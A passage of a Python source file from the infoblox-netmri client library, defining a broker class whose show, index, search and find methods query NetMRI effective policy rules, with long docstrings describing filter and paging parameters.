| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
78cd9f5d5b4739179dfe8dddba7f06b40d2b6a22
| 72,106
|
py
|
Python
|
infoblox_netmri/api/broker/v3_6_0/effective_policy_rule_broker.py
|
IngmarVG-IB/infoblox-netmri
|
b0c725fd64aee1890d83917d911b89236207e564
|
[
"Apache-2.0"
] | null | null | null |
infoblox_netmri/api/broker/v3_6_0/effective_policy_rule_broker.py
|
IngmarVG-IB/infoblox-netmri
|
b0c725fd64aee1890d83917d911b89236207e564
|
[
"Apache-2.0"
] | null | null | null |
infoblox_netmri/api/broker/v3_6_0/effective_policy_rule_broker.py
|
IngmarVG-IB/infoblox-netmri
|
b0c725fd64aee1890d83917d911b89236207e564
|
[
"Apache-2.0"
] | null | null | null |
from ..broker import Broker
class EffectivePolicyRuleBroker(Broker):
controller = "effective_policy_rules"
def show(self, **kwargs):
    """Fetch the details of one effective policy rule.

    :param PolicyRuleID: (Integer, required) Internal NetMRI identifier of
        the effective policy rule to display.
    :param methods: (Array of String, optional) Per-record methods to call on
        the returned rule and include in the output. Available:
        policy_rule_set_filter_text, policy_rule_rule_logic_text, devices,
        data_source.
    :param include: (Array of String, optional) Associated object types to
        include in the output, named by association. Available: data_source.
    :return effective_policy_rule: (EffectivePolicyRule) The rule identified
        by the given PolicyRuleID.
    """
    # Resolve the controller-qualified method name, then forward all keyword
    # arguments unchanged to the API layer.
    endpoint = self._get_method_fullname("show")
    return self.api_request(endpoint, kwargs)
def index(self, **kwargs):
    """List the available effective policy rules.

    Any of the recognized inputs may be used to narrow the list; other
    inputs are ignored. Of the various list-query methods, this is the most
    efficient.

    :param PolicyRuleID: (Integer, or Array of Integer from API 2.5,
        optional) Internal NetMRI identifier(s) of effective policy rules.
    :param PolicyRuleShortName: (String, or Array of String from API 2.5,
        optional) Policy rule short name(s), as shown on the policy status
        display.
    :param DeviceGroupID: (Array of Integer, optional) Device group
        identifiers to which the results are limited.
    :param timestamp: (DateTime, optional) Return the rules as of this date
        and time; defaults to the most recently collected data.
    :param methods: (Array of String, optional) Per-record methods to call
        and include in the output. Available: policy_rule_set_filter_text,
        policy_rule_rule_logic_text, devices, data_source.
    :param include: (Array of String, optional) Associated object types to
        include. Available: data_source.
    :param start: (Integer, default 0) Record number at which the selected
        page of data begins.
    :param limit: (Integer, default 1000, max 10000) Page size; data is
        broken into pages of this many records.
    :param sort: (Array of String, default PolicyRuleID) Field name(s) to
        sort the output by; any EffectivePolicyRule attribute is valid.
    :param dir: (Array of String, default 'asc') Sort direction(s), 'asc'
        or 'desc'.
    :param select: (Array, optional) Attributes to return for each
        EffectivePolicyRule; all attributes if empty or omitted.
    :param goto_field: (String, optional, API 2.8+) Field name for NIOS
        GOTO row positioning.
    :param goto_value: (String, optional, API 2.8+) Value of goto_field for
        NIOS GOTO row positioning.
    :return effective_policy_rules: (Array of EffectivePolicyRule) The
        rules matching the specified input criteria.
    """
    # Delegate to the paginated list-request helper under this broker's
    # controller-qualified "index" endpoint.
    endpoint = self._get_method_fullname("index")
    return self.api_list_request(endpoint, kwargs)
def search(self, **kwargs):
    """List the effective policy rules matching the input criteria.

    More flexible than :meth:`index`, but more demanding on the system and
    slower. The field-valued inputs below filter the result exactly as in
    the index method, and may be combined with the optional query string
    and XML filter.

    Field filters (each accepts a scalar, or an Array of that type from
    API 2.5): DataSourceID (Integer), PolicyRuleActionAfterExec (String,
    not used), PolicyRuleAuthor (String), PolicyRuleChangedCols (String),
    PolicyRuleCreatedAt (String), PolicyRuleDescription (String),
    PolicyRuleEndTime (DateTime), PolicyRuleFirstSeenTime (DateTime),
    PolicyRuleID (Integer), PolicyRuleName (String),
    PolicyRuleReadOnlyInd (Boolean), PolicyRuleRemediation (String),
    PolicyRuleRuleLogic (String), PolicyRuleSetFilter (String),
    PolicyRuleSeverity (String), PolicyRuleShortName (String),
    PolicyRuleStartTime (DateTime), PolicyRuleTimestamp (DateTime),
    PolicyRuleUpdatedAt (String).

    :param DeviceGroupID: (Array of Integer, optional) Device group
        identifiers to which the results are limited.
    :param timestamp: (DateTime, optional) Return the rules as of this date
        and time; defaults to the most recently collected data.
    :param methods: (Array of String, optional) Per-record methods to call
        and include in the output. Available: policy_rule_set_filter_text,
        policy_rule_rule_logic_text, devices, data_source.
    :param include: (Array of String, optional) Associated object types to
        include. Available: data_source.
    :param start: (Integer, default 0) Record number at which the selected
        page of data begins.
    :param limit: (Integer, default 1000, max 10000) Page size.
    :param sort: (Array of String, default PolicyRuleID) Field name(s) to
        sort the output by.
    :param dir: (Array of String, default 'asc') Sort direction(s), 'asc'
        or 'desc'.
    :param select: (Array, optional) Attributes to return for each
        EffectivePolicyRule; all attributes if empty or omitted.
    :param goto_field: (String, optional, API 2.8+) Field name for NIOS
        GOTO row positioning.
    :param goto_value: (String, optional, API 2.8+) Value of goto_field for
        NIOS GOTO row positioning.
    :param query: (String, optional) Value matched against all attributes
        listed above; records where one or more attributes contain the
        value are returned. Surround with '/'...'/' for a regular
        expression search instead of containment.
    :param xml_filter: (String, optional, API 2.3+) A SetFilter XML
        structure to further refine the search; applied after any query or
        field values but before limit/pagination. May be costly if not
        paired with database-level filtering.
    :return effective_policy_rules: (Array of EffectivePolicyRule) The
        rules matching the specified input criteria.
    """
    # Delegate to the paginated list-request helper under this broker's
    # controller-qualified "search" endpoint.
    endpoint = self._get_method_fullname("search")
    return self.api_list_request(endpoint, kwargs)
def find(self, **kwargs):
"""Lists the available effective policy rules matching the input specification. This provides the most flexible search specification of all the query mechanisms, enabling searching using comparison operations other than equality. However, it is more complex to use and will not perform as efficiently as the index or search methods. In the input descriptions below, 'field names' refers to the following fields: DataSourceID, PolicyRuleActionAfterExec, PolicyRuleAuthor, PolicyRuleChangedCols, PolicyRuleCreatedAt, PolicyRuleDescription, PolicyRuleEndTime, PolicyRuleFirstSeenTime, PolicyRuleID, PolicyRuleName, PolicyRuleReadOnlyInd, PolicyRuleRemediation, PolicyRuleRuleLogic, PolicyRuleSetFilter, PolicyRuleSeverity, PolicyRuleShortName, PolicyRuleStartTime, PolicyRuleTimestamp, PolicyRuleUpdatedAt.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DataSourceID: The operator to apply to the field DataSourceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DataSourceID: If op_DataSourceID is specified, the field named in this input will be compared to the value in DataSourceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DataSourceID must be specified if op_DataSourceID is specified.
:type val_f_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DataSourceID: If op_DataSourceID is specified, this value will be compared to the value in DataSourceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DataSourceID must be specified if op_DataSourceID is specified.
:type val_c_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_PolicyRuleActionAfterExec: The operator to apply to the field PolicyRuleActionAfterExec. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. PolicyRuleActionAfterExec: Not used. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_PolicyRuleActionAfterExec: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_PolicyRuleActionAfterExec: If op_PolicyRuleActionAfterExec is specified, the field named in this input will be compared to the value in PolicyRuleActionAfterExec using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_PolicyRuleActionAfterExec must be specified if op_PolicyRuleActionAfterExec is specified.
:type val_f_PolicyRuleActionAfterExec: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_PolicyRuleActionAfterExec: If op_PolicyRuleActionAfterExec is specified, this value will be compared to the value in PolicyRuleActionAfterExec using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_PolicyRuleActionAfterExec must be specified if op_PolicyRuleActionAfterExec is specified.
:type val_c_PolicyRuleActionAfterExec: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_PolicyRuleAuthor: The operator to apply to the field PolicyRuleAuthor. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. PolicyRuleAuthor: The author of the policy rule at the time of evaluation. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_PolicyRuleAuthor: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_PolicyRuleAuthor: If op_PolicyRuleAuthor is specified, the field named in this input will be compared to the value in PolicyRuleAuthor using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_PolicyRuleAuthor must be specified if op_PolicyRuleAuthor is specified.
:type val_f_PolicyRuleAuthor: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_PolicyRuleAuthor: If op_PolicyRuleAuthor is specified, this value will be compared to the value in PolicyRuleAuthor using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_PolicyRuleAuthor must be specified if op_PolicyRuleAuthor is specified.
:type val_c_PolicyRuleAuthor: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_PolicyRuleChangedCols: The operator to apply to the field PolicyRuleChangedCols. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. PolicyRuleChangedCols: The fields that changed between this revision of the record and the previous revision. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_PolicyRuleChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_PolicyRuleChangedCols: If op_PolicyRuleChangedCols is specified, the field named in this input will be compared to the value in PolicyRuleChangedCols using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_PolicyRuleChangedCols must be specified if op_PolicyRuleChangedCols is specified.
:type val_f_PolicyRuleChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_PolicyRuleChangedCols: If op_PolicyRuleChangedCols is specified, this value will be compared to the value in PolicyRuleChangedCols using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_PolicyRuleChangedCols must be specified if op_PolicyRuleChangedCols is specified.
:type val_c_PolicyRuleChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_PolicyRuleCreatedAt: The operator to apply to the field PolicyRuleCreatedAt. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. PolicyRuleCreatedAt: The date and time the policy rule was first added to NetMRI. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_PolicyRuleCreatedAt: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_PolicyRuleCreatedAt: If op_PolicyRuleCreatedAt is specified, the field named in this input will be compared to the value in PolicyRuleCreatedAt using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_PolicyRuleCreatedAt must be specified if op_PolicyRuleCreatedAt is specified.
:type val_f_PolicyRuleCreatedAt: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_PolicyRuleCreatedAt: If op_PolicyRuleCreatedAt is specified, this value will be compared to the value in PolicyRuleCreatedAt using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_PolicyRuleCreatedAt must be specified if op_PolicyRuleCreatedAt is specified.
:type val_c_PolicyRuleCreatedAt: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_PolicyRuleDescription: The operator to apply to the field PolicyRuleDescription. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. PolicyRuleDescription: The description of the policy rule at the time of evaluation. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_PolicyRuleDescription: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_PolicyRuleDescription: If op_PolicyRuleDescription is specified, the field named in this input will be compared to the value in PolicyRuleDescription using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_PolicyRuleDescription must be specified if op_PolicyRuleDescription is specified.
:type val_f_PolicyRuleDescription: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_PolicyRuleDescription: If op_PolicyRuleDescription is specified, this value will be compared to the value in PolicyRuleDescription using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_PolicyRuleDescription must be specified if op_PolicyRuleDescription is specified.
:type val_c_PolicyRuleDescription: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_PolicyRuleEndTime: The operator to apply to the field PolicyRuleEndTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. PolicyRuleEndTime: The ending effective time of this record, or empty if still in effect. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_PolicyRuleEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_PolicyRuleEndTime: If op_PolicyRuleEndTime is specified, the field named in this input will be compared to the value in PolicyRuleEndTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_PolicyRuleEndTime must be specified if op_PolicyRuleEndTime is specified.
:type val_f_PolicyRuleEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_PolicyRuleEndTime: If op_PolicyRuleEndTime is specified, this value will be compared to the value in PolicyRuleEndTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_PolicyRuleEndTime must be specified if op_PolicyRuleEndTime is specified.
:type val_c_PolicyRuleEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_PolicyRuleFirstSeenTime: The operator to apply to the field PolicyRuleFirstSeenTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. PolicyRuleFirstSeenTime: The date and time when this policy rule was first seen on the NetMRI. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_PolicyRuleFirstSeenTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_PolicyRuleFirstSeenTime: If op_PolicyRuleFirstSeenTime is specified, the field named in this input will be compared to the value in PolicyRuleFirstSeenTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_PolicyRuleFirstSeenTime must be specified if op_PolicyRuleFirstSeenTime is specified.
:type val_f_PolicyRuleFirstSeenTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_PolicyRuleFirstSeenTime: If op_PolicyRuleFirstSeenTime is specified, this value will be compared to the value in PolicyRuleFirstSeenTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_PolicyRuleFirstSeenTime must be specified if op_PolicyRuleFirstSeenTime is specified.
:type val_c_PolicyRuleFirstSeenTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_PolicyRuleID: The operator to apply to the field PolicyRuleID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. PolicyRuleID: The internal NetMRI identifier for this effective policy rule. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_PolicyRuleID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_PolicyRuleID: If op_PolicyRuleID is specified, the field named in this input will be compared to the value in PolicyRuleID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_PolicyRuleID must be specified if op_PolicyRuleID is specified.
:type val_f_PolicyRuleID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_PolicyRuleID: If op_PolicyRuleID is specified, this value will be compared to the value in PolicyRuleID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_PolicyRuleID must be specified if op_PolicyRuleID is specified.
:type val_c_PolicyRuleID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_PolicyRuleName: The operator to apply to the field PolicyRuleName. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. PolicyRuleName: The long name of the policy rule. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_PolicyRuleName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_PolicyRuleName: If op_PolicyRuleName is specified, the field named in this input will be compared to the value in PolicyRuleName using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_PolicyRuleName must be specified if op_PolicyRuleName is specified.
:type val_f_PolicyRuleName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_PolicyRuleName: If op_PolicyRuleName is specified, this value will be compared to the value in PolicyRuleName using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_PolicyRuleName must be specified if op_PolicyRuleName is specified.
:type val_c_PolicyRuleName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_PolicyRuleReadOnlyInd: The operator to apply to the field PolicyRuleReadOnlyInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. PolicyRuleReadOnlyInd: A flag indicating whether this is a read-only policy rule. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_PolicyRuleReadOnlyInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_PolicyRuleReadOnlyInd: If op_PolicyRuleReadOnlyInd is specified, the field named in this input will be compared to the value in PolicyRuleReadOnlyInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_PolicyRuleReadOnlyInd must be specified if op_PolicyRuleReadOnlyInd is specified.
:type val_f_PolicyRuleReadOnlyInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_PolicyRuleReadOnlyInd: If op_PolicyRuleReadOnlyInd is specified, this value will be compared to the value in PolicyRuleReadOnlyInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_PolicyRuleReadOnlyInd must be specified if op_PolicyRuleReadOnlyInd is specified.
:type val_c_PolicyRuleReadOnlyInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_PolicyRuleRemediation: The operator to apply to the field PolicyRuleRemediation. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. PolicyRuleRemediation: The textual remediation description associated with the rule. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_PolicyRuleRemediation: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_PolicyRuleRemediation: If op_PolicyRuleRemediation is specified, the field named in this input will be compared to the value in PolicyRuleRemediation using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_PolicyRuleRemediation must be specified if op_PolicyRuleRemediation is specified.
:type val_f_PolicyRuleRemediation: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_PolicyRuleRemediation: If op_PolicyRuleRemediation is specified, this value will be compared to the value in PolicyRuleRemediation using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_PolicyRuleRemediation must be specified if op_PolicyRuleRemediation is specified.
:type val_c_PolicyRuleRemediation: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_PolicyRuleRuleLogic: The operator to apply to the field PolicyRuleRuleLogic. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. PolicyRuleRuleLogic: The XML policy rule logic. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_PolicyRuleRuleLogic: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_PolicyRuleRuleLogic: If op_PolicyRuleRuleLogic is specified, the field named in this input will be compared to the value in PolicyRuleRuleLogic using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_PolicyRuleRuleLogic must be specified if op_PolicyRuleRuleLogic is specified.
:type val_f_PolicyRuleRuleLogic: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_PolicyRuleRuleLogic: If op_PolicyRuleRuleLogic is specified, this value will be compared to the value in PolicyRuleRuleLogic using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_PolicyRuleRuleLogic must be specified if op_PolicyRuleRuleLogic is specified.
:type val_c_PolicyRuleRuleLogic: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_PolicyRuleSetFilter: The operator to apply to the field PolicyRuleSetFilter. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. PolicyRuleSetFilter: The XML SetFilter used to determine if this rule applies to a specific device. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_PolicyRuleSetFilter: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_PolicyRuleSetFilter: If op_PolicyRuleSetFilter is specified, the field named in this input will be compared to the value in PolicyRuleSetFilter using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_PolicyRuleSetFilter must be specified if op_PolicyRuleSetFilter is specified.
:type val_f_PolicyRuleSetFilter: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_PolicyRuleSetFilter: If op_PolicyRuleSetFilter is specified, this value will be compared to the value in PolicyRuleSetFilter using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_PolicyRuleSetFilter must be specified if op_PolicyRuleSetFilter is specified.
:type val_c_PolicyRuleSetFilter: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_PolicyRuleSeverity: The operator to apply to the field PolicyRuleSeverity. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. PolicyRuleSeverity: The severity level (info, warning, or error) for a violation of this rule. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_PolicyRuleSeverity: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_PolicyRuleSeverity: If op_PolicyRuleSeverity is specified, the field named in this input will be compared to the value in PolicyRuleSeverity using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_PolicyRuleSeverity must be specified if op_PolicyRuleSeverity is specified.
:type val_f_PolicyRuleSeverity: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_PolicyRuleSeverity: If op_PolicyRuleSeverity is specified, this value will be compared to the value in PolicyRuleSeverity using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_PolicyRuleSeverity must be specified if op_PolicyRuleSeverity is specified.
:type val_c_PolicyRuleSeverity: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_PolicyRuleShortName: The operator to apply to the field PolicyRuleShortName. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. PolicyRuleShortName: The policy rule short name, used on the policy status display. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_PolicyRuleShortName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_PolicyRuleShortName: If op_PolicyRuleShortName is specified, the field named in this input will be compared to the value in PolicyRuleShortName using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_PolicyRuleShortName must be specified if op_PolicyRuleShortName is specified.
:type val_f_PolicyRuleShortName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_PolicyRuleShortName: If op_PolicyRuleShortName is specified, this value will be compared to the value in PolicyRuleShortName using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_PolicyRuleShortName must be specified if op_PolicyRuleShortName is specified.
:type val_c_PolicyRuleShortName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_PolicyRuleStartTime: The operator to apply to the field PolicyRuleStartTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. PolicyRuleStartTime: The starting effective time of this record. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_PolicyRuleStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_PolicyRuleStartTime: If op_PolicyRuleStartTime is specified, the field named in this input will be compared to the value in PolicyRuleStartTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_PolicyRuleStartTime must be specified if op_PolicyRuleStartTime is specified.
:type val_f_PolicyRuleStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_PolicyRuleStartTime: If op_PolicyRuleStartTime is specified, this value will be compared to the value in PolicyRuleStartTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_PolicyRuleStartTime must be specified if op_PolicyRuleStartTime is specified.
:type val_c_PolicyRuleStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_PolicyRuleTimestamp: The operator to apply to the field PolicyRuleTimestamp. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. PolicyRuleTimestamp: The date and time this record was collected or calculated. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_PolicyRuleTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_PolicyRuleTimestamp: If op_PolicyRuleTimestamp is specified, the field named in this input will be compared to the value in PolicyRuleTimestamp using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_PolicyRuleTimestamp must be specified if op_PolicyRuleTimestamp is specified.
:type val_f_PolicyRuleTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_PolicyRuleTimestamp: If op_PolicyRuleTimestamp is specified, this value will be compared to the value in PolicyRuleTimestamp using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_PolicyRuleTimestamp must be specified if op_PolicyRuleTimestamp is specified.
:type val_c_PolicyRuleTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_PolicyRuleUpdatedAt: The operator to apply to the field PolicyRuleUpdatedAt. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. PolicyRuleUpdatedAt: The date and time the policy rule was last updated in NetMRI. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_PolicyRuleUpdatedAt: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_PolicyRuleUpdatedAt: If op_PolicyRuleUpdatedAt is specified, the field named in this input will be compared to the value in PolicyRuleUpdatedAt using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_PolicyRuleUpdatedAt must be specified if op_PolicyRuleUpdatedAt is specified.
:type val_f_PolicyRuleUpdatedAt: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_PolicyRuleUpdatedAt: If op_PolicyRuleUpdatedAt is specified, this value will be compared to the value in PolicyRuleUpdatedAt using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_PolicyRuleUpdatedAt must be specified if op_PolicyRuleUpdatedAt is specified.
:type val_c_PolicyRuleUpdatedAt: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the effective policy rules as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of effective policy rule methods. The listed methods will be called on each effective policy rule returned and included in the output. Available methods are: policy_rule_set_filter_text, policy_rule_rule_logic_text, devices, data_source.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: data_source.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
